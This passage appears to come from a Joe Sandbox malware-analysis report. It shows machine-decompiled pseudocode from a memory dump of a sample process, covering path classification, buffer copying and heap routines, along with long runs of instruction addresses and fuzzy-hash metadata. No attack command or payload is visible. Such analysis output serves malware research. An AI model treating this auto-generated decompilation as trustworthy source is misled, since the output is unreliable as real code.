															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E00A6F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E00A6F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E00AF4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E00A7D130(_t427, _t494, _t511);
				}
			}










































































                                                              0x00af5ba5
                                                              0x00af5baa
                                                              0x00af5baf
                                                              0x00af5bb4
                                                              0x00af5bb6
                                                              0x00af5bbc
                                                              0x00af5bbe
                                                              0x00af5bc4
                                                              0x00af5bcd
                                                              0x00af5bd3
                                                              0x00af5bd6
                                                              0x00af5bdc
                                                              0x00af5be0
                                                              0x00af5be3
                                                              0x00af5beb
                                                              0x00af5bf2
                                                              0x00af5bf8
                                                              0x00af5bfe
                                                              0x00af5c04
                                                              0x00af5c0e
                                                              0x00af5c18
                                                              0x00af5c1f
                                                              0x00af5c25
                                                              0x00af5c2a
                                                              0x00af5c2c
                                                              0x00af5c32
                                                              0x00af5c3a
                                                              0x00af5c3f
                                                              0x00af5c42
                                                              0x00af5c48
                                                              0x00af5c5b
                                                              0x00af5c5b
                                                              0x00af5c2c
                                                              0x00af5cb7
                                                              0x00af5cb9
                                                              0x00af5cbf
                                                              0x00af5cc2
                                                              0x00af5cca
                                                              0x00af5ccb
                                                              0x00af5ccb
                                                              0x00af5cd1
                                                              0x00af5cd7
                                                              0x00af5cda
                                                              0x00af5ce1
                                                              0x00af5ce4
                                                              0x00af5ce7
                                                              0x00af5ced
                                                              0x00af5cf3
                                                              0x00af5cf9
                                                              0x00af5cff
                                                              0x00af5d08
                                                              0x00af5d0a
                                                              0x00af5d0e
                                                              0x00af5d10
                                                              0x00000000
                                                              0x00000000
                                                              0x00af5d16
                                                              0x00af5d1a
                                                              0x00000000
                                                              0x00000000
                                                              0x00af5d20
                                                              0x00af5d22
                                                              0x00af5d25
                                                              0x00af5d2f
                                                              0x00af5d2f
                                                              0x00af5d33
                                                              0x00af5d3d
                                                              0x00af5d49
                                                              0x00af5d4b
                                                              0x00000000
                                                              0x00000000
                                                              0x00af5d5a
                                                              0x00af5d5d
                                                              0x00af5d60
                                                              0x00000000
                                                              0x00000000
                                                              0x00af5d66
                                                              0x00af5d69
                                                              0x00000000
                                                              0x00000000
                                                              0x00af5d6f
                                                              0x00af5d6f
                                                              0x00af5d73
                                                              0x00af5d79
                                                              0x00af5d7f
                                                              0x00af5d86
                                                              0x00af5d95
                                                              0x00af5d98
                                                              0x00af5dba
                                                              0x00af5dcb
                                                              0x00af5dce
                                                              0x00af5dd3
                                                              0x00af5dd6
                                                              0x00af5dd8
                                                              0x00af5de6
                                                              0x00af5dec
                                                              0x00af5dee
                                                              0x00af5df1
                                                              0x00af5df3
                                                              0x00af635a
                                                              0x00af635a
                                                              0x00000000
                                                              0x00af635a
                                                              0x00af5dfe
                                                              0x00af5e02
                                                              0x00af5e05
                                                              0x00af5e07
                                                              0x00af5e10
                                                              0x00af5e13
                                                              0x00af5e1b
                                                              0x00af5e1c
                                                              0x00af5e21
                                                              0x00af5e22
                                                              0x00af5e23
                                                              0x00af5e25
                                                              0x00af5e2a
                                                              0x00af5e2c
                                                              0x00af5e2e
                                                              0x00af5e36
                                                              0x00af5e39
                                                              0x00af5e42
                                                              0x00af5e47
                                                              0x00af5e4d
                                                              0x00af5e54
                                                              0x00af5e54
                                                              0x00af5e54
                                                              0x00af5e2e
                                                              0x00af5e5c
                                                              0x00af5e5f
                                                              0x00af5e62
                                                              0x00af5e64
                                                              0x00af5e6b
                                                              0x00af5e70
                                                              0x00af5e7a
                                                              0x00af5e7a
                                                              0x00af5e7a
                                                              0x00af5e6b
                                                              0x00af5e7e
                                                              0x00af5e7f
                                                              0x00af5e7f
                                                              0x00af5e81
                                                              0x00af5e87
                                                              0x00af5e8b
                                                              0x00af5e8c
                                                              0x00af5e8c
                                                              0x00af5e8c
                                                              0x00af5e9a
                                                              0x00af5e9c
                                                              0x00af5ea2
                                                              0x00af5ea6
                                                              0x00af5f50
                                                              0x00af5f50
                                                              0x00af5f57
                                                              0x00af5f66
                                                              0x00af5f66
                                                              0x00af5f66
                                                              0x00af5f68
                                                              0x00af5f6a
                                                              0x00af63d0
                                                              0x00000000
                                                              0x00af5f70
                                                              0x00af5f70
                                                              0x00af5f91
                                                              0x00af5f9c
                                                              0x00af5f9e
                                                              0x00af5fa4
                                                              0x00af5fa6
                                                              0x00af638c
                                                              0x00af6392
                                                              0x00af63a1
                                                              0x00af63a7
                                                              0x00af63af
                                                              0x00af63af
                                                              0x00af63bd
                                                              0x00af63d8
                                                              0x00000000
                                                              0x00af63d8
                                                              0x00af5fac
                                                              0x00af5fb2
                                                              0x00af5fb4
                                                              0x00af5fbd
                                                              0x00af5fc6
                                                              0x00af5fce
                                                              0x00af5fd4
                                                              0x00af5fdc
                                                              0x00af5fec
                                                              0x00af5fed
                                                              0x00af5fee
                                                              0x00af5fef
                                                              0x00af5ff9
                                                              0x00af5ffa
                                                              0x00af5ffb
                                                              0x00af5ffc
                                                              0x00af6000
                                                              0x00af6004
                                                              0x00af6012
                                                              0x00af6012
                                                              0x00af6018
                                                              0x00af6019
                                                              0x00af601a
                                                              0x00af601b
                                                              0x00af601c
                                                              0x00af6020
                                                              0x00af6059
                                                              0x00af605c
                                                              0x00af6061
                                                              0x00af6061
                                                              0x00af6022
                                                              0x00af6022
                                                              0x00af6022
                                                              0x00af6025
                                                              0x00af602a
                                                              0x00af602b
                                                              0x00af6031
                                                              0x00af6037
                                                              0x00af6038
                                                              0x00af603e
                                                              0x00af6048
                                                              0x00af6049
                                                              0x00af604a
                                                              0x00af604b
                                                              0x00af604c
                                                              0x00af604d
                                                              0x00af6053
                                                              0x00af6054
                                                              0x00af6054
                                                              0x00af6062
                                                              0x00af6065
                                                              0x00af6067
                                                              0x00af606a
                                                              0x00af6070
                                                              0x00af6075
                                                              0x00af6076
                                                              0x00af6081
                                                              0x00af6087
                                                              0x00af6095
                                                              0x00af6099
                                                              0x00af609e
                                                              0x00af60a4
                                                              0x00af60ae
                                                              0x00af60b0
                                                              0x00af60b3
                                                              0x00af60b6
                                                              0x00af60b8
                                                              0x00af60ba
                                                              0x00af60ba
                                                              0x00af60ba
                                                              0x00af60ba
                                                              0x00af60be
                                                              0x00af60c0
                                                              0x00af60c5
                                                              0x00af60c5
                                                              0x00af60c5
                                                              0x00af60c6
                                                              0x00af60cd
                                                              0x00af6114
                                                              0x00af60cf
                                                              0x00af60cf
                                                              0x00af60d4
                                                              0x00af60d5
                                                              0x00af60da
                                                              0x00af60db
                                                              0x00af60e1
                                                              0x00af60e2
                                                              0x00af60e8
                                                              0x00af60f8
                                                              0x00af60fd
                                                              0x00af60fe
                                                              0x00af6102
                                                              0x00af6104
                                                              0x00af6107
                                                              0x00af6109
                                                              0x00af610b
                                                              0x00af610b
                                                              0x00af610b
                                                              0x00af610b
                                                              0x00af610f
                                                              0x00af610f
                                                              0x00af6117
                                                              0x00af611a
                                                              0x00af611f
                                                              0x00af6125
                                                              0x00af6134
                                                              0x00af6139
                                                              0x00af613f
                                                              0x00af6146
                                                              0x00af6148
                                                              0x00af614b
                                                              0x00af614d
                                                              0x00af614f
                                                              0x00af614f
                                                              0x00af614f
                                                              0x00af614f
                                                              0x00af6153
                                                              0x00af6159
                                                              0x00af6159
                                                              0x00af615c
                                                              0x00af6163
                                                              0x00af6169
                                                              0x00af616c
                                                              0x00af6172
                                                              0x00af6181
                                                              0x00af6186
                                                              0x00af6187
                                                              0x00af618b
                                                              0x00af6191
                                                              0x00af6195
                                                              0x00af61a3
                                                              0x00af61bb
                                                              0x00af61c0
                                                              0x00af61c3
                                                              0x00af61cc
                                                              0x00af61d0
                                                              0x00af61dc
                                                              0x00af61de
                                                              0x00af61e1
                                                              0x00af61e4
                                                              0x00af61e6
                                                              0x00af61e8
                                                              0x00af61e8
                                                              0x00af61e8
                                                              0x00af61e8
                                                              0x00af61e6
                                                              0x00af61ec
                                                              0x00af61f3
                                                              0x00af6203
                                                              0x00af6209
                                                              0x00af620a
                                                              0x00af6216
                                                              0x00af621d
                                                              0x00af6227
                                                              0x00af6241
                                                              0x00af6246
                                                              0x00af624c
                                                              0x00af6257
                                                              0x00af6259
                                                              0x00af625c
                                                              0x00af625e
                                                              0x00af6260
                                                              0x00af6260
                                                              0x00af6260
                                                              0x00af6260
                                                              0x00af625e
                                                              0x00af6264
                                                              0x00af6267
                                                              0x00af6269
                                                              0x00af6315
                                                              0x00af6315
                                                              0x00af631b
                                                              0x00af631e
                                                              0x00af6324
                                                              0x00af6327
                                                              0x00af632f
                                                              0x00af6330
                                                              0x00af6333
                                                              0x00af633a
                                                              0x00af633c
                                                              0x00af6335
                                                              0x00af6335
                                                              0x00af6335
                                                              0x00af633f
                                                              0x00af6342
                                                              0x00af634c
                                                              0x00af6352
                                                              0x00af6355
                                                              0x00af6355
                                                              0x00af6359
                                                              0x00000000
                                                              0x00af626f
                                                              0x00af6275
                                                              0x00af6275
                                                              0x00af6278
                                                              0x00af627e
                                                              0x00af627e
                                                              0x00af6281
                                                              0x00af6287
                                                              0x00af628d
                                                              0x00af6298
                                                              0x00af629c
                                                              0x00af62a2
                                                              0x00af629e
                                                              0x00af629e
                                                              0x00af629e
                                                              0x00af62a7
                                                              0x00af62a7
                                                              0x00af62aa
                                                              0x00af62b0
                                                              0x00af62f0
                                                              0x00af62f0
                                                              0x00af62f2
                                                              0x00af62f8
                                                              0x00af62fd
                                                              0x00af62b2
                                                              0x00af62b2
                                                              0x00af62b2
                                                              0x00af62b5
                                                              0x00af62dd
                                                              0x00af62e2
                                                              0x00af62e5
                                                              0x00af62b7
                                                              0x00af62b8
                                                              0x00af62bb
                                                              0x00af62bd
                                                              0x00af62c0
                                                              0x00af62c4
                                                              0x00af62cd
                                                              0x00af62cd
                                                              0x00af62c0
                                                              0x00af62bb
                                                              0x00af62b5
                                                              0x00af6302
                                                              0x00af6303
                                                              0x00af6305
                                                              0x00af6305
                                                              0x00af6305
                                                              0x00af630c
                                                              0x00af630c
                                                              0x00000000
                                                              0x00af627e
                                                              0x00af6269
                                                              0x00af5eac
                                                              0x00af5ebb
                                                              0x00af5ebe
                                                              0x00af5ecb
                                                              0x00af5ecb
                                                              0x00af5ece
                                                              0x00af5ece
                                                              0x00af5ed4
                                                              0x00af5ed7
                                                              0x00af5ed9
                                                              0x00af5edb
                                                              0x00af5edb
                                                              0x00af5ee1
                                                              0x00af5ee1
                                                              0x00af5ee3
                                                              0x00af5f20
                                                              0x00af5f20
                                                              0x00af5ee5
                                                              0x00af5ee5
                                                              0x00af5ee5
                                                              0x00af5ee8
                                                              0x00af5f11
                                                              0x00af5f18
                                                              0x00af5eea
                                                              0x00af5eea
                                                              0x00af5eed
                                                              0x00af5ef2
                                                              0x00af5ef8
                                                              0x00af5efb
                                                              0x00af5f0a
                                                              0x00af5f0a
                                                              0x00af5eed
                                                              0x00af5ee8
                                                              0x00af5f22
                                                              0x00af5f28
                                                              0x00000000
                                                              0x00000000
                                                              0x00af5f30
                                                              0x00af5f31
                                                              0x00af5f37
                                                              0x00af5f3a
                                                              0x00af5f3d
                                                              0x00af5f44
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af5f46
                                                              0x00af5f48
                                                              0x00af5f4d
                                                              0x00000000
                                                              0x00af5f4d
                                                              0x00af5dda
                                                              0x00af5ddf
                                                              0x00000000
                                                              0x00af5ddf
                                                              0x00af5dd8
                                                              0x00af5da7
                                                              0x00af5da9
                                                              0x00af5dac
                                                              0x00af5dae
                                                              0x00000000
                                                              0x00af5db4
                                                              0x00af5db4
                                                              0x00000000
                                                              0x00af5db4
                                                              0x00af5dae
                                                              0x00af5d88
                                                              0x00af5d8d
                                                              0x00af6363
                                                              0x00af6369
                                                              0x00af636a
                                                              0x00af6370
                                                              0x00af6372
                                                              0x00af637a
                                                              0x00af637b
                                                              0x00af637d
                                                              0x00000000
                                                              0x00000000
                                                              0x00af637f
                                                              0x00af6385
                                                              0x00000000
                                                              0x00af6385
                                                              0x00af5d38
                                                              0x00af5d3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af5d3b
                                                              0x00af5d27
                                                              0x00af5d29
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af6360
                                                              0x00000000
                                                              0x00af6360
                                                              0x00af5c10
                                                              0x00af5c10
                                                              0x00af63da
                                                              0x00af63e5
                                                              0x00af63e5

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3131d44b96280df7d1daa3cfd6d2d20f17f8fa10b799213b469127a1fced07fe
                                                              • Instruction ID: 837d4bd2dcc9b3a741b93448a758a9dac1bf1f4f39259eb80a0266bd9fb5b4ea
                                                              • Opcode Fuzzy Hash: 3131d44b96280df7d1daa3cfd6d2d20f17f8fa10b799213b469127a1fced07fe
                                                              • Instruction Fuzzy Hash: 5C425C71D00629CFDB24CFA8C981BA9B7B1FF49304F1581AAEA4DEB242D7359985CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A44120 Relevance: .4, Instructions: 444COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 92%
                                                              			E00A44120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0xb1d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E00A5F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E00A46E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L00A44620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E00A46E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M00A445F8))) {
												case 0:
													_v568 = 0xa01078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0xa011c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L00A44620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E00A6F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E00A6F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E00A252A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E00A3EB70(1, 0xb179a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E00A3AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E00A695D0();
																			L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E00A6B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E00A63D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E00A6B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                              0x00a44128
                                                              0x00a44135
                                                              0x00a4413c
                                                              0x00a44141
                                                              0x00a44145
                                                              0x00a44147
                                                              0x00a4414e
                                                              0x00a44151
                                                              0x00a44159
                                                              0x00a4415c
                                                              0x00a44160
                                                              0x00a44164
                                                              0x00a44168
                                                              0x00a4416c
                                                              0x00a4417f
                                                              0x00a44181
                                                              0x00a4446a
                                                              0x00a4446a
                                                              0x00a4418c
                                                              0x00a44195
                                                              0x00a44199
                                                              0x00a44432
                                                              0x00a44439
                                                              0x00a4443d
                                                              0x00a44442
                                                              0x00a44447
                                                              0x00000000
                                                              0x00a4419f
                                                              0x00a441a3
                                                              0x00a441b1
                                                              0x00a441b9
                                                              0x00a441bd
                                                              0x00a445db
                                                              0x00a445db
                                                              0x00000000
                                                              0x00a441c3
                                                              0x00a441c3
                                                              0x00a441ce
                                                              0x00a441d4
                                                              0x00a8e138
                                                              0x00a8e13e
                                                              0x00a8e169
                                                              0x00a8e16d
                                                              0x00a8e19e
                                                              0x00a8e16f
                                                              0x00a8e16f
                                                              0x00a8e175
                                                              0x00a8e179
                                                              0x00a8e18f
                                                              0x00a8e193
                                                              0x00000000
                                                              0x00a8e199
                                                              0x00000000
                                                              0x00a8e199
                                                              0x00a8e193
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a441da
                                                              0x00a441da
                                                              0x00a441df
                                                              0x00a441e4
                                                              0x00a441ec
                                                              0x00a44203
                                                              0x00a44207
                                                              0x00a8e1fd
                                                              0x00a44222
                                                              0x00a44226
                                                              0x00a8e1f3
                                                              0x00a8e1f3
                                                              0x00a4422c
                                                              0x00a4422c
                                                              0x00a44233
                                                              0x00a8e1ed
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a44239
                                                              0x00a44239
